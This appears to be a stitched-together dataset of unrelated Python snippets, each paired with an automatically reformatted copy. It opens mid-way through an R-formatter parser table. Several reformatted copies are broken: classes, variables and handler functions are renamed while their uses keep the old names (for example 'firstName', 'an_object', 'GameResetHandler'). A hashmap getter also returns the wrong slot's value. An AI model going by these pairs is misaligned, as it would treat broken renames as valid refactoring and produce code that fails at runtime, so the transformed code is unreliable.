'/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 973), ('formlist -> <empty>', 'formlist', 0, 'p_formlist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 980), ('formlist -> form', 'formlist', 1, 'p_formlist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 981), ('formlist -> form , formlist', 'formlist', 3, 'p_formlist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 982), ('form -> SYMBOL', 'form', 1, 'p_form', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 993), ('form -> SYMBOL EQ_ASSIGN expr', 'form', 3, 'p_form', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 994), ('expr -> expr [ sublist ]', 'expr', 4, 'p_expr_subscript', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 1003), ('expr -> expr LBB sublist ] ]', 'expr', 5, 'p_expr_subscript', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 1004)]
class Solution: def __init__(self): self.arr = [0] * (3 * int(1e4)) def findDuplicate(self, nums: List[int]) -> int: for i in range (len(nums)): self.arr[nums[i]] = self.arr[nums[i]] + 1 if self.arr[nums[i]] == 2: return nums[i] return 0
class Solution: def __init__(self): self.arr = [0] * (3 * int(10000.0)) def find_duplicate(self, nums: List[int]) -> int: for i in range(len(nums)): self.arr[nums[i]] = self.arr[nums[i]] + 1 if self.arr[nums[i]] == 2: return nums[i] return 0
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. "Test root module outputs." def test_vpc_ranges(plan): "VPC ranges should match input variables." ranges = plan.outputs['vpc_subnets'] for subnet in plan.variables['subnets']: assert ranges[subnet['subnet_name']] == subnet['subnet_ip'] def test_project_ids(plan): "Project ids should use prefix and match expected values." prefix = plan.variables['prefix'] assert plan.outputs['host_project_id'] == prefix + '-vpc-host' assert plan.outputs['service_project_ids']['gce'] == prefix + '-gce'
"""Test root module outputs.""" def test_vpc_ranges(plan): """VPC ranges should match input variables.""" ranges = plan.outputs['vpc_subnets'] for subnet in plan.variables['subnets']: assert ranges[subnet['subnet_name']] == subnet['subnet_ip'] def test_project_ids(plan): """Project ids should use prefix and match expected values.""" prefix = plan.variables['prefix'] assert plan.outputs['host_project_id'] == prefix + '-vpc-host' assert plan.outputs['service_project_ids']['gce'] == prefix + '-gce'
#!/usr/bin/env python3 #Antonio Karlo Mijares def read_file_string(file_name): # Takes a filename string, returns a string of all lines in the file f = open(file_name, 'r') read = f.read() return read def read_file_list(file_name): # Takes a filename string, returns a list of lines without new-line characters f2 = open(file_name, 'r') f2read = f2.read() linesplit = f2read.splitlines() return linesplit if __name__ == '__main__': file_name = 'data.txt' print(read_file_string(file_name)) print(read_file_list(file_name))
def read_file_string(file_name): f = open(file_name, 'r') read = f.read() return read def read_file_list(file_name): f2 = open(file_name, 'r') f2read = f2.read() linesplit = f2read.splitlines() return linesplit if __name__ == '__main__': file_name = 'data.txt' print(read_file_string(file_name)) print(read_file_list(file_name))
{ "targets": [ { "target_name": "node-runtime-stats", "sources": [ "lib/nativeStats.cc" ], "include_dirs": [ "<!(node -e \"require('nan')\")" ], } ] }
{'targets': [{'target_name': 'node-runtime-stats', 'sources': ['lib/nativeStats.cc'], 'include_dirs': ['<!(node -e "require(\'nan\')")']}]}
print("Tejaswi") print("AM.EN.U4ECE18038") print("ECE") print("marvel roxx")
print('Tejaswi') print('AM.EN.U4ECE18038') print('ECE') print('marvel roxx')
def get_first_of_type(iterable, type_): # pragma: no cover return next(i for i in iterable if isinstance(i, type_)) def get_values_of_type(iterable, type_): return (i for i in iterable if isinstance(i, type_))
def get_first_of_type(iterable, type_): return next((i for i in iterable if isinstance(i, type_))) def get_values_of_type(iterable, type_): return (i for i in iterable if isinstance(i, type_))
APPLICATION = { "workspaces" : [{"id":1, "name":"WS-1", "dir":"d:/quark/WS-1"}, {"id":2, "name":"WS-2", "dir":"d:/quark/WS-2"}, {"id":3, "name":"WS-3", "dir":"d:/quark/WS-3"}], "user": { "name" : "John Doe", "email" : "john@doe.com" }, "repo_limit" : 10, "tags" : [ "Data Analytics 101", "Artificial Intelligence", "Arcticle", "Quark" ], "scores" : [100, 200, 300, 400] } WORKSPACE = { "scripts" : [], "experiments" : [] } EXPERIMENT = { "pipeline" : [], "params" : {} }
application = {'workspaces': [{'id': 1, 'name': 'WS-1', 'dir': 'd:/quark/WS-1'}, {'id': 2, 'name': 'WS-2', 'dir': 'd:/quark/WS-2'}, {'id': 3, 'name': 'WS-3', 'dir': 'd:/quark/WS-3'}], 'user': {'name': 'John Doe', 'email': 'john@doe.com'}, 'repo_limit': 10, 'tags': ['Data Analytics 101', 'Artificial Intelligence', 'Arcticle', 'Quark'], 'scores': [100, 200, 300, 400]} workspace = {'scripts': [], 'experiments': []} experiment = {'pipeline': [], 'params': {}}
secret = "1537" anzahl = 0 anzahlf = 0 raten = "" found = "" #will contain the positions of found numbers, to make sure that one number isn't found twice while not raten == secret: raten = input('Errate die vierstellige Ziffer: ') for i in range(4): if secret[i] == raten[i]: #print( 'Die ' + str(i+1) +'. Ziffer ist korrekt!') anzahl = anzahl + 1 #decreating half correct counter in the case that a number was "found" at the wrong spot #but later found in the right spot -> right spot is more important that false spot if str(i) in found: anzahlf -= 1 found += str(i) #strorring number at this position was found #checking that this position wasn't found earlier elif not -1 == secret.find(raten[i]) and str(secret.find(raten[i])) not in found: #print ('Die ' + str(raten[i]) +'. Ziffer ist in den Secret, aber an der falschen Stelle!') anzahlf = anzahlf + 1 found += str(secret.find(raten[i])) #strorring number at this position was found if not anzahl == 0: print(str(anzahl) + " Ziffern sind richtig.") if not anzahlf == 0: print(str(anzahlf) + " Ziffern sind richtig ABER an der falschen Stelle!") if anzahlf == 0 and anzahl == 0: print('Alle Ziffern sind falsch!') anzahlf = 0 anzahl = 0 found = "" print("Du hast es erratten!")
secret = '1537' anzahl = 0 anzahlf = 0 raten = '' found = '' while not raten == secret: raten = input('Errate die vierstellige Ziffer: ') for i in range(4): if secret[i] == raten[i]: anzahl = anzahl + 1 if str(i) in found: anzahlf -= 1 found += str(i) elif not -1 == secret.find(raten[i]) and str(secret.find(raten[i])) not in found: anzahlf = anzahlf + 1 found += str(secret.find(raten[i])) if not anzahl == 0: print(str(anzahl) + ' Ziffern sind richtig.') if not anzahlf == 0: print(str(anzahlf) + ' Ziffern sind richtig ABER an der falschen Stelle!') if anzahlf == 0 and anzahl == 0: print('Alle Ziffern sind falsch!') anzahlf = 0 anzahl = 0 found = '' print('Du hast es erratten!')
class ZigbeeMessage: def __init__(self, message): self.raw = message def get_signal_level(self): if ('linkquality' in self.raw): return int(int(self.raw['linkquality']) * 11 / 255) else: return None def get_battery_level(self): if ('battery' in self.raw): return int(float(self.raw['battery'])) else: return None
class Zigbeemessage: def __init__(self, message): self.raw = message def get_signal_level(self): if 'linkquality' in self.raw: return int(int(self.raw['linkquality']) * 11 / 255) else: return None def get_battery_level(self): if 'battery' in self.raw: return int(float(self.raw['battery'])) else: return None
random_keys = {} random_keys["astring"] = "somestring" random_keys[5] = "aninteger" random_keys[25.2] = "floats work too" random_keys[("abc", 123)] = "so do tuples" class AnObject: def __init__(self, avalue): self.avalue = avalue my_object = AnObject(14) random_keys[my_object] = "We can even store objects" my_object.avalue = 12 try: random_keys[[1,2,3]] = "we can't store lists though" except: print("unable to store list\n") for key, value in random_keys.items(): print("{} has value {}".format(key, value))
random_keys = {} random_keys['astring'] = 'somestring' random_keys[5] = 'aninteger' random_keys[25.2] = 'floats work too' random_keys['abc', 123] = 'so do tuples' class Anobject: def __init__(self, avalue): self.avalue = avalue my_object = an_object(14) random_keys[my_object] = 'We can even store objects' my_object.avalue = 12 try: random_keys[[1, 2, 3]] = "we can't store lists though" except: print('unable to store list\n') for (key, value) in random_keys.items(): print('{} has value {}'.format(key, value))
class artist(): name=None date=None area=None type=None gender=None score=None def __init__(self,ar,da,na,ge,ty,sc): self.name=na self.date=da self.area=ar self.type=ty self.gender=ge self.score=sc def __str__(self): return "[{},{},{},{},{},{}]".format(self.area,self.date,self.name,self.gender,self.type,self.score)
class Artist: name = None date = None area = None type = None gender = None score = None def __init__(self, ar, da, na, ge, ty, sc): self.name = na self.date = da self.area = ar self.type = ty self.gender = ge self.score = sc def __str__(self): return '[{},{},{},{},{},{}]'.format(self.area, self.date, self.name, self.gender, self.type, self.score)
columns = { 'CreatedAt': 'createdAt', 'UpdatedAt': 'updatedAt', '_id': '_id', 'Name': 'name', 'Ref': 'ref', 'RefId': 'refId', 'RefIndustryId': 'refIndustryId', 'State': 'state', 'Ticker': 'ticker', '__v': '__v', 'StatsLastSyncedFilingsAt': 'stats.lastSyncedFilingsAt', 'StatsLastSyncedEarningsAt': 'stats.lastSyncedEarningsAt' }
columns = {'CreatedAt': 'createdAt', 'UpdatedAt': 'updatedAt', '_id': '_id', 'Name': 'name', 'Ref': 'ref', 'RefId': 'refId', 'RefIndustryId': 'refIndustryId', 'State': 'state', 'Ticker': 'ticker', '__v': '__v', 'StatsLastSyncedFilingsAt': 'stats.lastSyncedFilingsAt', 'StatsLastSyncedEarningsAt': 'stats.lastSyncedEarningsAt'}
def main(self): self.data["totalScore"] = 0 self.data["streak"] = 0 self.data["rank"] = 1 def GameResetHandler(): self.data["totalScore"] = 0 self.data["rank"] = 0 self.data["streak"] = 0 self.quiz = None self.on("GameReset",GameResetHandler) def QuestionStartHandler(event): def typ(self): return self["type"] def index(self): return self["questionIndex"] event.update({ "answer": self.answer, "type": property(typ), "index": property(index) }) self.on("QuestionStart",QuestionStartHandler) def QuizStartHandler(event): def questionCount(self): return len(self.quizQuestionAnswers) event.update({ "questionCount": property(questionCount) }) try: self.quiz.update(event) except Exception: pass self.on("QuizStart",QuizStartHandler) def QuestionReadyHandler(event): def typ(self): return self["gameBlockType"] def index(self): return self["questionIndex"] event.update({ "type": property(typ), "index": property(index) }) try: self.quiz["currentQuestion"].update(event) except Exception: pass self.on("QuestionReady",QuestionReadyHandler) def QuestionEndHandler(event): self.data["totalScore"] = event["totalScore"] self.data["streak"] = event["pointsData"]["answerStreakPoints"]["streakLevel"] self.data["rank"] = event["rank"] self.on("QuestionEnd",QuestionEndHandler)
def main(self): self.data['totalScore'] = 0 self.data['streak'] = 0 self.data['rank'] = 1 def game_reset_handler(): self.data['totalScore'] = 0 self.data['rank'] = 0 self.data['streak'] = 0 self.quiz = None self.on('GameReset', GameResetHandler) def question_start_handler(event): def typ(self): return self['type'] def index(self): return self['questionIndex'] event.update({'answer': self.answer, 'type': property(typ), 'index': property(index)}) self.on('QuestionStart', QuestionStartHandler) def quiz_start_handler(event): def question_count(self): return len(self.quizQuestionAnswers) event.update({'questionCount': property(questionCount)}) try: self.quiz.update(event) except Exception: pass self.on('QuizStart', QuizStartHandler) def question_ready_handler(event): def typ(self): return self['gameBlockType'] def index(self): return self['questionIndex'] event.update({'type': property(typ), 'index': property(index)}) try: self.quiz['currentQuestion'].update(event) except Exception: pass self.on('QuestionReady', QuestionReadyHandler) def question_end_handler(event): self.data['totalScore'] = event['totalScore'] self.data['streak'] = event['pointsData']['answerStreakPoints']['streakLevel'] self.data['rank'] = event['rank'] self.on('QuestionEnd', QuestionEndHandler)
class TestClass: def __init__(self): self.a = "text" self.b = 39 self.c = 42.8 self.d = 0b01100001 self.el = [1, 2, 3, 4] self.fd = {'a': 1, 'b': "text", 'c': 3.5, 'd': 0b01100011} TestDict = { 'a': 1, 'b': "text", 'c': 3.5, 'd': 0b01100011, "el": [1, 2, 3, 4], "fd": {'ia': 1, 'ib': "text", 'ic': 3.5, 'id': 0b01100011} }
class Testclass: def __init__(self): self.a = 'text' self.b = 39 self.c = 42.8 self.d = 97 self.el = [1, 2, 3, 4] self.fd = {'a': 1, 'b': 'text', 'c': 3.5, 'd': 99} test_dict = {'a': 1, 'b': 'text', 'c': 3.5, 'd': 99, 'el': [1, 2, 3, 4], 'fd': {'ia': 1, 'ib': 'text', 'ic': 3.5, 'id': 99}}
def func01(): print("module01 - func01") def func02(): print("module01 - func02")
def func01(): print('module01 - func01') def func02(): print('module01 - func02')
''' Area() function write a program that inputs base and height of a triangle in main program and passes them to a function called area(b, h). b = base, h = height. The function finds the area of triangle and returns it to main program. The area should be displayed on the screen. Area = 1/2*base*height ''' def area(b, h): return 1 / 2 * b * h base = int(input("Enter base: ")) height = int(input("enter height: ")) print("area is", area(base, height)) # Enter base: 12 # enter height: 5 # area is 30.0
""" Area() function write a program that inputs base and height of a triangle in main program and passes them to a function called area(b, h). b = base, h = height. The function finds the area of triangle and returns it to main program. The area should be displayed on the screen. Area = 1/2*base*height """ def area(b, h): return 1 / 2 * b * h base = int(input('Enter base: ')) height = int(input('enter height: ')) print('area is', area(base, height))
class HashMap: def __init__(self, array_size): self.array_size = array_size self.array = [None for i in range(self.array_size)] def hash(self, key, collisions=0): key_bytes = str(key).encode() hash_code = sum(key_bytes) return hash_code + collisions def compressor(self, hash_code): return hash_code % self.array_size def setter(self, key, value): array_index = self.compressor(self.hash(key)) current_array_value = self.array[array_index] if current_array_value == None: self.array[array_index] = [key, value] return None elif current_array_value[0] == key: self.array[array_index] = [key, value] return None number_collisions = 1 while current_array_value[0] != key: new_hash_code = self.hash(key, number_collisions) new_array_index = self.compressor(new_hash_code) new_array_value = self.array[new_array_index] if new_array_value == None: self.array[new_array_index] = [key, value] return None elif new_array_value[0] == key: self.array[new_array_index] = [key, value] return None number_collisions += 1 def getter(self, key): array_index = self.compressor(self.hash(key)) current_array_value = self.array[array_index] if current_array_value == None: return None elif current_array_value[0] == key: return current_array_value[1] retrieve_collisions = 1 while current_array_value[0] != key: new_hash_code = self.hash(key, retrieve_collisions) new_array_index = self.compressor(new_hash_code) new_array_value = self.array[new_array_index] if new_array_value == None: return None elif new_array_value[0] == key: return current_array_value[1] retrieve_collisions += 1 def delete(self, key): array_index = self.compressor(self.hash(key)) current_array_value = self.array[array_index] if current_array_value == None: pass return elif current_array_value[0] == key: self.array[array_index] = None return del_collisions = 1 while current_array_value[0] != key: new_hash_code = self.hash(key, del_collisions) new_array_index = self.compressor(new_hash_code) new_array_value = self.array[new_array_index] if new_array_value == None: pass elif new_array_value[0] == key: self.array[new_array_index] = None return del_collisions += 1
class Hashmap: def __init__(self, array_size): self.array_size = array_size self.array = [None for i in range(self.array_size)] def hash(self, key, collisions=0): key_bytes = str(key).encode() hash_code = sum(key_bytes) return hash_code + collisions def compressor(self, hash_code): return hash_code % self.array_size def setter(self, key, value): array_index = self.compressor(self.hash(key)) current_array_value = self.array[array_index] if current_array_value == None: self.array[array_index] = [key, value] return None elif current_array_value[0] == key: self.array[array_index] = [key, value] return None number_collisions = 1 while current_array_value[0] != key: new_hash_code = self.hash(key, number_collisions) new_array_index = self.compressor(new_hash_code) new_array_value = self.array[new_array_index] if new_array_value == None: self.array[new_array_index] = [key, value] return None elif new_array_value[0] == key: self.array[new_array_index] = [key, value] return None number_collisions += 1 def getter(self, key): array_index = self.compressor(self.hash(key)) current_array_value = self.array[array_index] if current_array_value == None: return None elif current_array_value[0] == key: return current_array_value[1] retrieve_collisions = 1 while current_array_value[0] != key: new_hash_code = self.hash(key, retrieve_collisions) new_array_index = self.compressor(new_hash_code) new_array_value = self.array[new_array_index] if new_array_value == None: return None elif new_array_value[0] == key: return current_array_value[1] retrieve_collisions += 1 def delete(self, key): array_index = self.compressor(self.hash(key)) current_array_value = self.array[array_index] if current_array_value == None: pass return elif current_array_value[0] == key: self.array[array_index] = None return del_collisions = 1 while current_array_value[0] != key: new_hash_code = self.hash(key, del_collisions) new_array_index = self.compressor(new_hash_code) new_array_value = self.array[new_array_index] if new_array_value == None: pass elif new_array_value[0] == key: self.array[new_array_index] = None return del_collisions += 1
def test_get_persons(client): rs = client.get("/person/") assert rs.status_code == 200 all_persons = rs.json assert len(all_persons) > 0 selected_person = all_persons[0] rs = client.get("/person/" + str(selected_person['id'])) assert rs.status_code == 200 person = rs.json assert person is not None assert person['id'] == selected_person['id'] def test_get_all_address(client): all_persons = client.get("/person/").json selected_person = all_persons[0] rs = client.get("/person/" + str(selected_person['id']) + "/address/") assert rs.status_code == 200
def test_get_persons(client): rs = client.get('/person/') assert rs.status_code == 200 all_persons = rs.json assert len(all_persons) > 0 selected_person = all_persons[0] rs = client.get('/person/' + str(selected_person['id'])) assert rs.status_code == 200 person = rs.json assert person is not None assert person['id'] == selected_person['id'] def test_get_all_address(client): all_persons = client.get('/person/').json selected_person = all_persons[0] rs = client.get('/person/' + str(selected_person['id']) + '/address/') assert rs.status_code == 200
class Card: def confirmation_card(question, action, confirmation_item, message_to_confirm): confirmation_card = { "cards": [{ "header": { "title": "Iago", "subtitle": "Confirmation !", "imageUrl": "https://iago.aliction.com/avatar.png", "imageStyle": "IMAGE" }, "sections": [{ "widgets": [ { "keyValue": { "icon" : "EMAIL", "topLabel": confirmation_item, "content": message_to_confirm } } ] },{ "widgets": [{ "buttons": [{ "textButton": { "text": "Yes", "onClick": { "action": { "actionMethodName": action, "parameters":[ { "key": confirmation_item, "value": message_to_confirm },{ "key": "confirmed", "value": True } ] } } } }, { "textButton": { "text": "No", "onClick": { "action": { "actionMethodName": action, "parameters":[ { "key": confirmation_item, "value": message_to_confirm },{ "key": "confirmed", "value": False } ] } } } }] }] }] }] } return confirmation_card def access_card(self, auth_url): access_card = { "cards": [{ "header": { "title": "Iago", "subtitle": "Access Required", "imageUrl": "https://iago.aliction.com/avatar.png", "imageStyle": "IMAGE" }, "sections": [{ "widgets": [{ "buttons": [{ "textButton": { "text": "Grant Iago Access", "onClick": { "openLink": { "url": auth_url } } } }] }] }] }] } return access_card menu = { "cards": [{ "header": { "title": "Iago", "subtitle": "Menu", "imageUrl": "https://iago.aliction.com/avatar.png", "imageStyle": "IMAGE" }, "sections": [{ "widgets": [{ "buttons": [{ "textButton": { "text": "Only Update Sheet", "onClick": { "action": { "actionMethodName": "update_sheet", "parameters":[ { "key": "key_name", "value": "value" } ] } } } }] }] }, { "widgets": [{ "buttons": [{ "textButton": { "text": "Create Drafts", "onClick": { "action": { "actionMethodName": "create_drafts" } } } }] }] }, { "widgets": [{ "buttons": [{ "textButton": { "text": "Send Mails", "onClick": { "action": { "actionMethodName": "send_emails" } } } }] }] }] }] }
class Card: def confirmation_card(question, action, confirmation_item, message_to_confirm): confirmation_card = {'cards': [{'header': {'title': 'Iago', 'subtitle': 'Confirmation !', 'imageUrl': 'https://iago.aliction.com/avatar.png', 'imageStyle': 'IMAGE'}, 'sections': [{'widgets': [{'keyValue': {'icon': 'EMAIL', 'topLabel': confirmation_item, 'content': message_to_confirm}}]}, {'widgets': [{'buttons': [{'textButton': {'text': 'Yes', 'onClick': {'action': {'actionMethodName': action, 'parameters': [{'key': confirmation_item, 'value': message_to_confirm}, {'key': 'confirmed', 'value': True}]}}}}, {'textButton': {'text': 'No', 'onClick': {'action': {'actionMethodName': action, 'parameters': [{'key': confirmation_item, 'value': message_to_confirm}, {'key': 'confirmed', 'value': False}]}}}}]}]}]}]} return confirmation_card def access_card(self, auth_url): access_card = {'cards': [{'header': {'title': 'Iago', 'subtitle': 'Access Required', 'imageUrl': 'https://iago.aliction.com/avatar.png', 'imageStyle': 'IMAGE'}, 'sections': [{'widgets': [{'buttons': [{'textButton': {'text': 'Grant Iago Access', 'onClick': {'openLink': {'url': auth_url}}}}]}]}]}]} return access_card menu = {'cards': [{'header': {'title': 'Iago', 'subtitle': 'Menu', 'imageUrl': 'https://iago.aliction.com/avatar.png', 'imageStyle': 'IMAGE'}, 'sections': [{'widgets': [{'buttons': [{'textButton': {'text': 'Only Update Sheet', 'onClick': {'action': {'actionMethodName': 'update_sheet', 'parameters': [{'key': 'key_name', 'value': 'value'}]}}}}]}]}, {'widgets': [{'buttons': [{'textButton': {'text': 'Create Drafts', 'onClick': {'action': {'actionMethodName': 'create_drafts'}}}}]}]}, {'widgets': [{'buttons': [{'textButton': {'text': 'Send Mails', 'onClick': {'action': {'actionMethodName': 'send_emails'}}}}]}]}]}]}
# number: integer age = 20 # number: float (decimals e.g. 1.23) price = 100.13 #String: can be defined with single or double quotes msg = ' Hello world!' msg2 = "Hello world!" #Hello world with a variable print(msg) #Concatenation (combining strings) firstName = 'albert' lastName = 'einstein' fullName = firstName + ' ' + lastName print(fullName) #Print with format method print('My name is {0}, I am {1} years old'.format(fullName,age)) #Boolean variables can be True or False. myTrue = True myFalse = False print (myTrue) # the "not" keyword can be used to inverse a boolean value print(not myFalse) # read data from the keyboard in python userAge = input('How old are you? ') print('Your are {0} years old'.format(userAge))
age = 20 price = 100.13 msg = ' Hello world!' msg2 = 'Hello world!' print(msg) first_name = 'albert' last_name = 'einstein' full_name = firstName + ' ' + lastName print(fullName) print('My name is {0}, I am {1} years old'.format(fullName, age)) my_true = True my_false = False print(myTrue) print(not myFalse) user_age = input('How old are you? ') print('Your are {0} years old'.format(userAge))
x3d = { 'aliceblue': '0.941 0.973 1.000', 'antiquewhite': '0.980 0.922 0.843', 'aqua': '0.000 1.000 1.000', 'aquamarine': '0.498 1.000 0.831', 'azure': '0.941 1.000 1.000', 'beige': '0.961 0.961 0.863', 'bisque': '1.000 0.894 0.769', 'black': '0.000 0.000 0.000', 'blanchedalmond': '1.000 0.922 0.804', 'blue': '0.000 0.000 1.000', 'blueviolet': '0.541 0.169 0.886', 'brown': '0.647 0.165 0.165', 'burlywood': '0.871 0.722 0.529', 'cadetblue': '0.373 0.620 0.627', 'chartreuse': '0.498 1.000 0.000', 'chocolate': '0.824 0.412 0.118', 'coral': '1.000 0.498 0.314', 'cornflowerblue': '0.392 0.584 0.929', 'cornsilk': '1.000 0.973 0.863', 'crimson': '0.863 0.078 0.235', 'cyan': '0.000 1.000 1.000', 'darkblue': '0.000 0.000 0.545', 'darkcyan': '0.000 0.545 0.545', 'darkgoldenrod': '0.722 0.525 0.043', 'darkgray': '0.663 0.663 0.663', 'darkgreen': '0.000 0.392 0.000', 'darkgrey': '0.663 0.663 0.663', 'darkkhaki': '0.741 0.718 0.420', 'darkmagenta': '0.545 0.000 0.545', 'darkolivegreen': '0.333 0.420 0.184', 'darkorange': '1.000 0.549 0.000', 'darkorchid': '0.600 0.196 0.800', 'darkred': '0.545 0.000 0.000', 'darksalmon': '0.914 0.588 0.478', 'darkseagreen': '0.561 0.737 0.561', 'darkslateblue': '0.282 0.239 0.545', 'darkslategray': '0.184 0.310 0.310', 'darkslategrey': '0.184 0.310 0.310', 'darkturquoise': '0.000 0.808 0.820', 'darkviolet': '0.580 0.000 0.827', 'deeppink': '1.000 0.078 0.576', 'deepskyblue': '0.000 0.749 1.000', 'dimgray': '0.412 0.412 0.412', 'dimgrey': '0.412 0.412 0.412', 'dodgerblue': '0.118 0.565 1.000', 'firebrick': '0.698 0.133 0.133', 'floralwhite': '1.000 0.980 0.941', 'forestgreen': '0.133 0.545 0.133', 'fuchsia': '1.000 0.000 1.000', 'gainsboro': '0.863 0.863 0.863', 'ghostwhite': '0.973 0.973 1.000', 'gold': '1.000 0.843 0.000', 'goldenrod': '0.855 0.647 0.125', 'gray': '0.502 0.502 0.502', 'green': '0.000 0.502 0.000', 'greenyellow': '0.678 1.000 0.184', 'grey': '0.502 0.502 0.502', 'honeydew': '0.941 1.000 0.941', 'hotpink': '1.000 0.412 0.706', 'indianred': '0.804 0.361 0.361', 'indigo': '0.294 0.000 0.510', 'ivory': '1.000 1.000 0.941', 'khaki': '0.941 0.902 0.549', 'lavender': '0.902 0.902 0.980', 'lavenderblush': '1.000 0.941 0.961', 'lawngreen': '0.486 0.988 0.000', 'lemonchiffon': '1.000 0.980 0.804', 'lightblue': '0.678 0.847 0.902', 'lightcoral': '0.941 0.502 0.502', 'lightcyan': '0.878 1.000 1.000', 'lightgoldenrodyellow': '0.980 0.980 0.824', 'lightgray': '0.827 0.827 0.827', 'lightgreen': '0.565 0.933 0.565', 'lightgrey': '0.827 0.827 0.827', 'lightpink': '1.000 0.714 0.757', 'lightsalmon': '1.000 0.627 0.478', 'lightseagreen': '0.125 0.698 0.667', 'lightskyblue': '0.529 0.808 0.980', 'lightslategray': '0.467 0.533 0.600', 'lightslategrey': '0.467 0.533 0.600', 'lightsteelblue': '0.690 0.769 0.871', 'lightyellow': '1.000 1.000 0.878', 'lime': '0.000 1.000 0.000', 'limegreen': '0.196 0.804 0.196', 'linen': '0.980 0.941 0.902', 'magenta': '1.000 0.000 1.000', 'maroon': '0.502 0.000 0.000', 'mediumaquamarine': '0.400 0.804 0.667', 'mediumblue': '0.000 0.000 0.804', 'mediumorchid': '0.729 0.333 0.827', 'mediumpurple': '0.576 0.439 0.859', 'mediumseagreen': '0.235 0.702 0.443', 'mediumslateblue': '0.482 0.408 0.933', 'mediumspringgreen': '0.000 0.980 0.604', 'mediumturquoise': '0.282 0.820 0.800', 'mediumvioletred': '0.780 0.082 0.522', 'midnightblue': '0.098 0.098 0.439', 'mintcream': '0.961 1.000 0.980', 'mistyrose': '1.000 0.894 0.882', 'moccasin': '1.000 0.894 0.710', 'navajowhite': '1.000 0.871 0.678', 'navy': '0.000 0.000 0.502', 'oldlace': '0.992 0.961 0.902', 'olive': '0.502 0.502 0.000', 'olivedrab': '0.420 0.557 0.137', 'orange': '1.000 0.647 0.000', 'orangered': '1.000 0.271 0.000', 'orchid': '0.855 0.439 0.839', 'palegoldenrod': '0.933 0.910 0.667', 'palegreen': '0.596 0.984 0.596', 'paleturquoise': '0.686 0.933 0.933', 'palevioletred': '0.859 0.439 0.576', 'papayawhip': '1.000 0.937 0.835', 'peachpuff': '1.000 0.855 0.725', 'peru': '0.804 0.522 0.247', 'pink': '1.000 0.753 0.796', 'plum': '0.867 0.627 0.867', 'powderblue': '0.690 0.878 0.902', 'purple': '0.502 0.000 0.502', 'red': '1.000 0.000 0.000', 'rosybrown': '0.737 0.561 0.561', 'royalblue': '0.255 0.412 0.882', 'saddlebrown': '0.545 0.271 0.075', 'salmon': '0.980 0.502 0.447', 'sandybrown': '0.957 0.643 0.376', 'seagreen': '0.180 0.545 0.341', 'seashell': '1.000 0.961 0.933', 'sienna': '0.627 0.322 0.176', 'silver': '0.753 0.753 0.753', 'skyblue': '0.529 0.808 0.922', 'slateblue': '0.416 0.353 0.804', 'slategray': '0.439 0.502 0.565', 'slategrey': '0.439 0.502 0.565', 'snow': '1.000 0.980 0.980', 'springgreen': '0.000 1.000 0.498', 'steelblue': '0.275 0.510 0.706', 'tan': '0.824 0.706 0.549', 'teal': '0.000 0.502 0.502', 'thistle': '0.847 0.749 0.847', 'tomato': '1.000 0.388 0.278', 'turquoise': '0.251 0.878 0.816', 'violet': '0.933 0.510 0.933', 'wheat': '0.961 0.871 0.702', 'white': '1.000 1.000 1.000', 'whitesmoke': '0.961 0.961 0.961', 'yellow': '1.000 1.000 0.000', 'yellowgreen': '0.604 0.804 0.196',}
x3d = {'aliceblue': '0.941 0.973 1.000', 'antiquewhite': '0.980 0.922 0.843', 'aqua': '0.000 1.000 1.000', 'aquamarine': '0.498 1.000 0.831', 'azure': '0.941 1.000 1.000', 'beige': '0.961 0.961 0.863', 'bisque': '1.000 0.894 0.769', 'black': '0.000 0.000 0.000', 'blanchedalmond': '1.000 0.922 0.804', 'blue': '0.000 0.000 1.000', 'blueviolet': '0.541 0.169 0.886', 'brown': '0.647 0.165 0.165', 'burlywood': '0.871 0.722 0.529', 'cadetblue': '0.373 0.620 0.627', 'chartreuse': '0.498 1.000 0.000', 'chocolate': '0.824 0.412 0.118', 'coral': '1.000 0.498 0.314', 'cornflowerblue': '0.392 0.584 0.929', 'cornsilk': '1.000 0.973 0.863', 'crimson': '0.863 0.078 0.235', 'cyan': '0.000 1.000 1.000', 'darkblue': '0.000 0.000 0.545', 'darkcyan': '0.000 0.545 0.545', 'darkgoldenrod': '0.722 0.525 0.043', 'darkgray': '0.663 0.663 0.663', 'darkgreen': '0.000 0.392 0.000', 'darkgrey': '0.663 0.663 0.663', 'darkkhaki': '0.741 0.718 0.420', 'darkmagenta': '0.545 0.000 0.545', 'darkolivegreen': '0.333 0.420 0.184', 'darkorange': '1.000 0.549 0.000', 'darkorchid': '0.600 0.196 0.800', 'darkred': '0.545 0.000 0.000', 'darksalmon': '0.914 0.588 0.478', 'darkseagreen': '0.561 0.737 0.561', 'darkslateblue': '0.282 0.239 0.545', 'darkslategray': '0.184 0.310 0.310', 'darkslategrey': '0.184 0.310 0.310', 'darkturquoise': '0.000 0.808 0.820', 'darkviolet': '0.580 0.000 